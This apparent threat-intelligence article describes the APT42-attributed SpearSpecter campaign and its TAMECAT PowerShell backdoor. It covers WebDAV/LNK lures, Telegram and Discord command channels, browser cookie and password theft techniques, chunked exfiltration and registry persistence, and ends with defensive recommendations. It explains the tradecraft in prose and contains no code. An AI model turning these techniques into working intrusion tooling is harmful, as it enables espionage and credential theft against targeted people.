The SpearSpecter espionage campaign is one of the most advanced and sustained nation state cyber operations currently active, targeting senior defense officials, government personnel, policy experts, researchers, and individuals connected to high value decision making. According to new research published by the Israel National Digital Agency, SpearSpecter is operated by Iranian threat actors aligned with the Islamic Revolutionary Guard Corps Intelligence Organization. The group is widely known under multiple aliases including APT42, Mint Sandstorm, CharmingCypress, Educated Manticore, and UNC788. The campaign blends long term social engineering, cloud based command channels, fileless malware, and multi channel data exfiltration in a campaign that exemplifies the modern evolution of state sponsored espionage.
The SpearSpecter campaign demonstrates a high maturity level in both operational security and tailored targeting. Unlike broad phishing operations, this campaign focuses on building relationships with specific individuals who have strategic value. Operators spend days or weeks engaging targets using detailed knowledge gathered from social media, public biographies, academic publications, conference lists, and professional networks. Victims reported receiving personalized invitations to international summits, intelligence oriented working groups, and diplomatic round tables. In many cases, family members are approached to increase psychological pressure and to widen the attack surface. Communication often continues through WhatsApp to reinforce trust and authenticity, making the social engineering extremely difficult to detect.
Relationship Building and Social Engineering Tradecraft
SpearSpecter’s initial access phase stands out due to its sophistication. Operators perform detailed reconnaissance on each target before initiating communication. The threat actor constructs believable personas, often impersonating researchers, diplomats, policy advisors, or representatives from institutions directly relevant to the victim’s professional interests. These personas invite targets to view documents or confirm meeting details hosted on services such as OneDrive or Google Drive. Behind these credible façades, hidden redirects silently execute in the background and lead victims through an infection chain controlled by the attackers.
If credential harvesting is the objective, victims are redirected to spoofed meeting pages or cloned authentication portals that capture passwords in real time. If long term access is desired, the campaign deploys TAMECAT, a modular, fileless, PowerShell based backdoor designed for persistence, reconnaissance, command execution, and multi stage data theft. SpearSpecter selects the infection method based on the victim’s value and the depth of access required.
Initial Access Through WebDAV Lures and LNK Shortcuts
A hallmark of the SpearSpecter infection chain is the abuse of the Windows search-ms URI protocol. The lure link redirects the victim to a crafted page that triggers a prompt asking to open Windows Explorer. If the user accepts, the system connects to an attacker controlled WebDAV server and displays a malicious LNK file disguised as a PDF document. When executed, the LNK silently uses curl to download and run a batch script hosted on Cloudflare Workers. This batch script loads highly obfuscated PowerShell that fetches TAMECAT modules and runs them in memory.
This smooth transition from legitimate cloud platforms to attacker infrastructure makes the campaign extremely difficult for automated security tools to detect. Because the attacker never directly sends an executable file, traditional email or attachment scanning provides little protection. The WebDAV technique ensures initial access without immediately exposing the presence of malware.
TAMECAT: Modular Fileless Malware With Multi Channel Command and Control
TAMECAT is the core of the SpearSpecter intrusion. It uses a modular architecture designed to dynamically receive encrypted payloads, load them in memory, and execute them without writing persistent binaries to disk. This reduces forensic traces and complicates detection by traditional endpoint solutions.
Below is the placement point for the TAMECAT loader diagram image:
TAMECAT includes modules for system reconnaissance, file harvesting, browser data theft, screenshot capture, network discovery, credential extraction, remote command execution, and encrypted multi channel exfiltration. Modules are delivered through HTTPS, Telegram, and Discord, giving the operator multiple redundant command paths that increase resilience and complicate analysis.
Telegram Based Command and Control
One of SpearSpecter’s most notable advancements is the use of Telegram as a full command and control channel. TAMECAT monitors incoming messages from the attacker’s Telegram bot. If a message matches a predefined command name, the malware retrieves a payload from the attacker’s Cloudflare Workers infrastructure and executes it. If the message does not match a known command but is not an exit instruction, it is treated as raw PowerShell code and executed. Results are sent back to the attacker as Telegram messages.
This technique allows the attacker to maintain stealth and reliability because Telegram traffic looks identical to normal encrypted messaging traffic. Detection tools rarely flag legitimate messaging service connections.
Discord Based Command and Control
The campaign also uses Discord channels for C2. TAMECAT retrieves commands from a hardcoded channel ID using a bot token. The malware filters messages by author name to locate tasking instructions. Attached files contain encrypted PowerShell payloads that TAMECAT decrypts and executes in memory. After retrieving messages, the malware stores the last processed message ID in the registry to avoid replaying commands. This system allows coordinated management of multiple compromised hosts through a single Discord channel, a method that blends in with everyday internet activity.
System Reconnaissance and Document Harvesting
TAMECAT’s reconnaissance modules gather OS information, installed software, user privileges, process listings, network configuration, and system uptime. These modules also enumerate antivirus products and prepare selected files for exfiltration. The malware searches the entire filesystem for high value document types including PDFs, Office documents, password manager databases, cloud document formats, spreadsheets, Zip archives, and multimedia files. Paths are encoded in Base64 and stored in staging files such as ALL.txt under the user’s local cache directories.
Metadata is stored in FileCrawler.txt, providing the attacker detailed insight into the victim’s documents before extraction. TAMECAT avoids directories that create excessive noise such as OneDrive or large development environments. This selective targeting highlights the intelligence gathering nature of the campaign.
Browser Data Extraction
TAMECAT employs two advanced browser data theft techniques. For Microsoft Edge, the malware launches the browser in hidden mode with remote debugging enabled. It then connects to the debugging interface and requests decrypted cookies and session data directly from DevTools APIs. This bypasses the need to manually decrypt SQLite databases.
For Chrome, TAMECAT temporarily suspends the browser’s process using PsSuspend. With the process paused, database locks are released, enabling safe copying and decryption of sensitive browser files, including password databases and cookies. These are then parsed to extract login entries and browsing history.
Screenshot Capture and Email Collection
TAMECAT captures 50 screenshots at 15 second intervals and uploads each image before deleting it from disk. The malware also targets Outlook OST files, copying and exfiltrating entire mailbox archives for intelligence value. This reinforces SpearSpecter’s focus on long term espionage rather than rapid monetization or disruptive operations.
Chunked Data Exfiltration and Cloud Based Infrastructure
TAMECAT compresses stolen data using a renamed WinRAR utility and uploads it in 5 megabyte chunks using Runs.dll, a helper library that reads only small ranges from each file to avoid loading large files in memory. The malware sends each chunk inside an encrypted JSON envelope over HTTPS, FTP, or the same C2 channels used for command delivery.
This controlled staging and chunked transfer method evades large file detection and ensures reliable exfiltration even when network interruptions occur.
Obfuscation, Stealth, and Living Off The Land
The campaign uses extensive obfuscation including:
- String reconstruction from hundreds of fragments
- Encrypted payload blobs stitched together at runtime
- Wildcard resolution of PowerShell commands to evade signature based detection
- Use of trusted binaries such as conhost.exe, curl.exe, and msedge.exe
- Heavy reliance on in memory execution to minimize disk artifacts
Everything about TAMECAT’s design prioritizes stealth, persistence, and flexibility.
Persistence Mechanisms
SpearSpecter maintains persistence using multiple methods including a Run key named Renovation that launches an obfuscated batch file which in turn executes TAMECAT. It also uses the UserInitMprLogonScript registry key to launch another hidden batch script that posts heartbeat signals to a Firebase database. This script uses curl to send encrypted JSON containing timestamps and system identifiers, providing the attacker continuous awareness of active hosts.
Infrastructure and Attribution
The SpearSpecter infrastructure combines attacker controlled servers with commodity cloud services such as Somee, Scalingo, Cloudflare Workers, Tebi, Google Firebase, Discord, and Telegram. The distributed and disposable nature of the infrastructure aligns with publicly documented APT42 tradecraft. The WebDAV servers, search-ms abuse, TAMECAT tooling, and multichannel C2 strongly match techniques associated with IRGC aligned operators.
The INDA attributes this campaign with high confidence to APT42 based on the overlap in tooling, network infrastructure, social engineering approach, and operational discipline. The campaign’s focus on high ranking defense officials and decision makers reinforces the conclusion that the operation is intended to gather intelligence on behalf of the IRGC intelligence directorate.
Recommendations
Organizations at elevated risk of espionage should adopt the following steps:
- Enable PowerShell script block logging and AMSI integration
- Deploy EDR solutions capable of detecting in memory activity
- Disable the search-ms protocol to prevent WebDAV based delivery
- Monitor for anomalous Telegram or Discord traffic
- Deploy strong network baselining to detect unusual access patterns
- Provide senior officials with targeted awareness training
- Filter or block Cloudflare Workers traffic when appropriate
- Monitor for registry persistence keys such as Renovation and UserInitMprLogonScript
For more coverage of advanced espionage campaigns and state linked threat operations, visit the Botcrawl Data Breaches section and our Cybersecurity archive.
